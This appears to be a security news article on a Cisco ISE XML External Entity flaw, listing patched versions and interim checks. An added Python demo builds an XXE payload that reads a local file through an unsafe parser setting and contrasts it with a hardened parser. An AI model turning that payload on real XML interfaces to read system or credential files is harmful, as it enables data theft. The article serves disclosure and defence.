Cisco Releases Patch for CVE-2026-20029 in ISE, Risk of Sensitive Data Exposure via Web Management Interface


Friday, January 9, 2026

Cisco has released a security update for CVE-2026-20029, which affects Cisco Identity Services Engine (ISE) and the ISE Passive Identity Connector (ISE-PIC), products used for network access control and identity management. The flaw lies in how the web-based management interface processes XML input: an attacker who already holds valid administrator credentials can submit crafted XML and read arbitrary files on the underlying operating system. Improper XML handling that yields arbitrary file reads is the classic XML External Entity (XXE) pattern, in which a parser resolves an entity declared with a SYSTEM identifier and splices the referenced file into the parsed document. The files reachable this way include sensitive ones that the management interface is not meant to expose even to administrators, so the bug is an escape from the application's own privilege boundary into the host, not merely a misuse of admin rights.
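The bug class described above, as an added illustration: this is not Cisco or ISE code, and the XML document, the parser wrapper and the "secret" file it reads are constructed for the example. It uses Python's `xml.sax`, where the `feature_external_ges` switch decides whether SYSTEM entities are fetched, to show the same attacker-supplied document parsed by a vulnerable configuration (the file's contents come back as element text) and by the hardened one (the entity reference is left unexpanded).

```python
"""XXE demonstration: an XML parser that resolves external entities turns
attacker-supplied XML into an arbitrary file read on the host.

Added example, not code from Cisco or the ISE product. The document, the
parser wrapper and the secret file are constructed for illustration."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Gathers character data so we can see what the parser expanded."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts).strip()


def build_xxe_document(target_path):
    """Constructed attacker input: an external general entity whose SYSTEM
    identifier names a local file, referenced from element content. In a
    product like ISE the realistic delivery point is any admin-only XML
    import or upload; the element names here are made up."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE config [\n"
        f'  <!ENTITY leak SYSTEM "file://{target_path}">\n'
        "]>\n"
        "<config><name>&leak;</name></config>\n"
    ).encode()


def parse_untrusted_xml(data, resolve_external_entities):
    """resolve_external_entities=True is the unsafe configuration: xml.sax
    fetches whatever SYSTEM identifier the document names (a file:// URL
    here) and splices its contents into the parsed text. False, the default
    in Python >= 3.7.1, leaves the entity reference unexpanded."""
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(data))
    return handler.text()


def demo():
    """Write a stand-in for an OS file the web UI must never return, then
    parse the same document with the vulnerable and the hardened setting.
    Returns (text seen by the vulnerable parser, text seen by the hardened one)."""
    with tempfile.NamedTemporaryFile("w", suffix=".properties", delete=False) as f:
        f.write("db.password=not-for-admins")  # constructed secret
        secret_path = f.name
    try:
        doc = build_xxe_document(secret_path)
        leaked = parse_untrusted_xml(doc, resolve_external_entities=True)
        hardened = parse_untrusted_xml(doc, resolve_external_entities=False)
    finally:
        os.unlink(secret_path)
    return leaked, hardened


if __name__ == "__main__":
    leaked, hardened = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(hardened))
```

The point to take from the two return values is that the attacker never needs code execution: the parser does the file read on their behalf, with the privileges of the web application's OS account, and the result is rendered wherever the application echoes the parsed field. Disabling external entity resolution is the minimum fix; rejecting any document that carries a DOCTYPE at all is the stronger defence in depth, since it also removes parameter-entity and entity-expansion (billion laughs) tricks that this example does not show.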

The risk is heightened by the public release of proof-of-concept (PoC) exploit code, which lowers the effort needed to weaponize the flaw. Cisco's Product Security Incident Response Team (PSIRT) states that it has not observed active exploitation so far, but Cisco ISE has a track record as a high-value target: CVE-2025-20337, for example, was exploited in the wild to deploy malware. Because this flaw requires valid administrator credentials, the PoC does not by itself hand an outside attacker a foothold; it becomes dangerous the moment an admin credential is phished, reused, or taken from another compromised system, and ISE admin credentials are exactly the kind of asset an intruder goes after. Public exploit code for an identity-management appliance should therefore be treated as a serious warning sign that calls for immediate action.

To mitigate the risk, Cisco strongly recommends that administrators upgrade to the patched versions as soon as possible:

  • ISE / ISE-PIC 3.2 Patch 8
  • ISE / ISE-PIC 3.3 Patch 8
  • ISE / ISE-PIC 3.4 Patch 4

(Release 3.5 is not affected.)

Cisco stresses that interim measures are not a substitute for the fix and urges organizations to apply the updates promptly. Until that is done, the practical checks are the ones the precondition implies: confirm that the administration interface is reachable only from trusted management networks, review which accounts hold administrator rights and whether any are unused or shared, and watch for administrator logins followed by unexpected XML imports or uploads. These steps shrink the pool of who could trigger the bug, but only the patch removes the file-read path itself.

Source https://www.bleepingcomputer.com/news/security/cisco-warns-of-identity-service-engine-flaw-with-exploit-code/